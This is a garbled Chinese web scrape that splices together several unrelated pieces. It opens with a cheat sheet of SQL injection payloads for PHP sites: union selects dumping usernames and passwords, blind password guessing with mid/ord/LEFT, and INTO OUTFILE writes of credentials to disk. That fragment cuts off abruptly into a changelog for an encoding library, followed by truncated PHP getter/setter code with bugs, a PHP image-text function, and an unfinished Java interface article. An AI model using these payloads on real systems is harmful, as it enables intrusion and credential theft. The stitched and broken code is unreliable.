php注入方法集锦

''%23 

'' and passWord=''mypass 

id=-1 union select 1,1,1 

id=-1 union select char(97),char(97),char(97) 

id=1 union select 1,1,1 from members 

id=1 union select 1,1,1 from admin 

id=1 union select 1,1,1 from user 

userid=1 and password=mypass 

userid=1 and mid(password,3,1)=char(112) 

userid=1 and mid(password,4,1)=char(97) 

and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的） 

'' and LENGTH(password)=''6（探测密码长度） 

'' and LEFT(password,1)=''m 

'' and LEFT(password,2)=''my 

…………………………依次类推 

'' union select 1,username,password from user/* 

'' union select 1,username,password from user/* 

='' union select 1,username,password from user/* （可以是1或者=后直接跟） 

99999'' union select 1,username,password from user/* 

'' into outfile ''c:/file.txt （导出文件） 

='' or 1=1 into outfile ''c:/file.txt 

1'' union select 1,username,password from user into outfile ''c:/user.txt 

select password FROM admins where login=''John'' INTO DUMPFILE ''/path/to/site/file.txt'' 

id='' union select 1,username,password from user into outfile 

id=-1 union select 1,database(),version() （灵活应用查询） 

常用查询测试语句， 

select * FROM table where 1=1 

select * FROM table where ''uuu''=''uuu'' 

select * FROM table where 1<>2 

select * FROM&nbs 目前该类库可以实现，简体中文 <-> 繁体中文编码互换，简体中文、繁体中文 -> 拼音单向转换，
简体中文、繁体中文 <-> UTF8 编码转换，简体中文、繁体中文 -> Unicode单向转换

@作者 Hessian(solarischan@21cn.com)
@版本 1.5
@版权所有 Hessian / NETiS
@使用授权 GPL（不能应用于任何商业用途，无须经过作者同意即可修改代码，但修改后的代码必须按照GPL协议发布）
@特别鸣谢 unknow（繁简转换代码片断）
@起始 2003-04-01
@最后修改 2003-06-06
@访问 公开

更新记录

ver 1.7 2005-07-26
修改了while循环导致的bug。此bug当字符串最后一个字符为"0"的时候将处理错误。
受影响方法: CHStoUTF8() , CHStoUNICODE()

ver 1.6 2005-05-16
构造函数增加了一个参数以便用户可以方便的在使用的时候设置配置文件路径

ver 1.5 2003-06-06
增加 UTF8 转换到 GB2312、BIG5的功能。

ver 1.4 2003-04-07
增加 当转换HTML时设定为true，即可改变charset的值。

ver 1.3 2003-04-02
增加 繁体中文转换至拼音的功能。

ver 1.2 2003-04-02
合并 简体、繁体中文转换至UTF8的函数。
修改 简体中文转换至拼音的函数，返回值更改为字符串，每一个汉字的拼音用空格分开
增加 简体中文转换为 UNICODE 的功能。
增加 繁体中文转换为 UNICODE 的功能。

ver 1.1 2003-04-02
增加 OpenFile() 函数，支持打开本地文件和远程文件。
增加 简体中文转换为 UTF8 的功能。
增加 繁体中文转换为 UTF8 的功能。

ver 1.0 2003-04-01
一个集合了中文简体，中文繁体对应各种编码互换的类库已经初步完成。

作者：老王

Getter/Setter的用法在Java社区里很常见，比如说在Entity Bean或者DTO中，这东西有的时候很必要，有的时候则乏味得很。Php社区一般都是跟着Java社区的步伐匍匐前进，所以很多人在思想上继承了这样的做法。

先看看PHP中最一般的做法：

class Demo {
      private $name;
      private $age;

      public function getName() {
          return $this->name;
      }

      public function setName($name) {
          $this->name = $name;
      }

      public function getAge() {
          return $this->$age;
      }

      public function setAge($age) {
          $this->age = $age;
      }
}

当然，因为Php脚本语言的灵活性，借助__call这样的魔术方法，如果你的属性很多，我们可以写得更简便些：

class Demo {
      private $name;
      private $age;

      public function __call($name, $args) {
          if (preg_match(''/^(get|set)(w+)/'', $name, $match)) {
              $firstChar = substr($match[2], 0, 1);
              $lastChars = substr($match[2], 1);
              $this->$attribute = strtolower($firstChar) . $lastChars;

              if (''get'' == $match[1]) {
                  return $this->$attribute;
              } else {
                  $this->$attribute = $args[0];
  &

<?php
// **************************************** //
// 功能:给图片添加文字
// 参数: $img 图片文件名
// $new_img 另存图片文件名,如果为空表示不另存图片
// $text 字符串内容
// text_size 字符串大小
// text_angle 字型串输出角度
// text_x 字符串输出 x 坐标
// text_y 字符串输出 y 坐标
// $text_font 字型文件名
// $r,$g,$b 字符串颜色RGB值
// **************************************** //
function img_text($img, $new_img, $text, $text_size, $text_angle, $text_x, $text_y, $text_font, $r, $g, $b){

$text=iconv("gb2312","UTF-8",$text);
Header("Content-type: image/gif");
$im = @imagecreatefromstring(file_get_contents($img)) or die ("打开图片失败!");
$color = ImageColorAllocate($im, $r,$g,$b);

//ImageTTFText(int im, int size, int angle, int x, int y, int col, string fontfile, string text)：
//本函数将 TTF (TrueType Fonts) 字型文字写入图片。
//参数: size 为字形的尺寸；
// angle 为字型的角度，顺时针计算，0 度为水平(由左到右)，90 度则为由下到上的文字；
// x,y 二参数为文字的坐标值 (原点为左上角)；
// col 为字的颜色；
// fontfile 为字型文件名称；
// text 是字符串内容。
ImageTTFText($im, $text_size, $text_angle, $text_x, $text_y, $color, $text_font, $text);

if ($new_img==""):
ImageGif($im); // 不保存图片,只显示
else:
ImageGif($im,$new_img); // 保存图片,但不显示
endif;

ImageDestroy($im); //结束图形，释放内存空间
} 

?>

  最近学习PHP5接口的过程中遇到了困难 ，书中说是实现多重继承的一种方式，但我依然不知道具体该如何实现。在网上查PHP接口的资料很少，就查了java的，其实基本上都差不多。看完包装机《澄清Java（接口与继承）》这篇文章才恍然大悟，原来包装机我一开始理解就有误，所谓的多重继承是指接口继承类，而不是类继承接口。
    文章中提到了OO的抽象，正如文章中的那句话——"抽象就是抽去像的部分"，很形象，以前想到抽象总是认为很难理解，抽象嘛，哈哈，现在就很容易理解了，这也正是接口和抽象类所要做的事情。
    文章中还有很多观点也让我受益匪浅，罗列如下：
            OO的精髓，我以为，是对对象的抽象。
            接口的作用，一言以蔽之，就是标志类的类别（type of class）。把不同类型的类归于不同的接口，可以更好的管理他们。
            继承的意义也在于抽象，而不是代码重用。
     看完这篇文章，现在基本上理解接口、抽象类、继承该如何应用了。

原文如下：
澄清Java（接口与继承）　计算机学院研二的兄弟与我讨论Java，一见面，几个问题全是关于接口，接口有什么用？为什么要用接口？什么时候该使用接口？很庆幸他们不是问我 Java如何连接SQL Server，或者是如何开发J2EE应用，这类问题有杀伤力，避之则吉。今年计算机学院本科有个毕业设计课题是做J2ME，选这个题目的学生在5月末都还在苦着脸研究java.util.*这个包，这个这个……唉。

　　大多数人认为，接口的意义在于顶替多重继承。众所周知Java没有c++那样多重继承的机制，但是却能够实作多个接口。其实这样做是很牵强的，接口和继承是完全不同的东西，接口没有能力代替多重继承，也没有这个义务。接口的作用，一言以蔽之，就是标志类的类别（type of class）。把不同类型的类归于不同的接口，可以更好的管理他们。OO的精髓，我以为，是对对象的抽象，最能体现这一点的就是接口。为什么我们讨论设计模式都只针对具备了抽象能力的语言（比如c++、java、c#等），就是因为设计模式所研究的，实际上就是如何合理的去抽象。（cowboy的名言是“抽象就是抽去像的部分”，看似调侃，实乃至理）。

　　设计模式中最基础的是工厂模式（Factory），在我最近的一个很简单的应用中，我想尽量的让我的程序能够在多个数据库间移植，当然，这涉及很多问题，单是如何兼容不同DBMS的SQL就让人头痛。我们不妨先把问题简单化，只考虑如何连接不同的数据库。

　　假设我有很多个类，分别是Mysql.java、SQLServer.java、Oracle.java、 DB2.java，他们分别连接不同的数据库，统一返回一个Connection对象，并且都有一个close方法，用于关闭连接。只需要针对你的 DBMS，选择不同的类，就可以用了，但是我的用户他会使用什么数据库？我不知道，我希望的是尽量少的修改代码，就能满足他的需要。我可以抽象如下接口：
package org.bromon.test;
public interface DB
{
　　java.sql.Connection openDB(String url,String user,String password);
　　void close();
}

　　这个接口只定义两个方法，没有任何有实际意义的代码，具体的代码由实作这个接口的类来给出，比如Mysql.java：

Package org.bromon.test;
import java.sql.*;
public class Mysql implements DB
{
　　private String url=”jdbc:mysql:localhost:3306/test”;
　　private String user=”root”;
　　private String password=””;
　　private Connection conn;
　　public Connection openDB(url,user,password)
　　{
　　　　//连接数据库的代码
　　}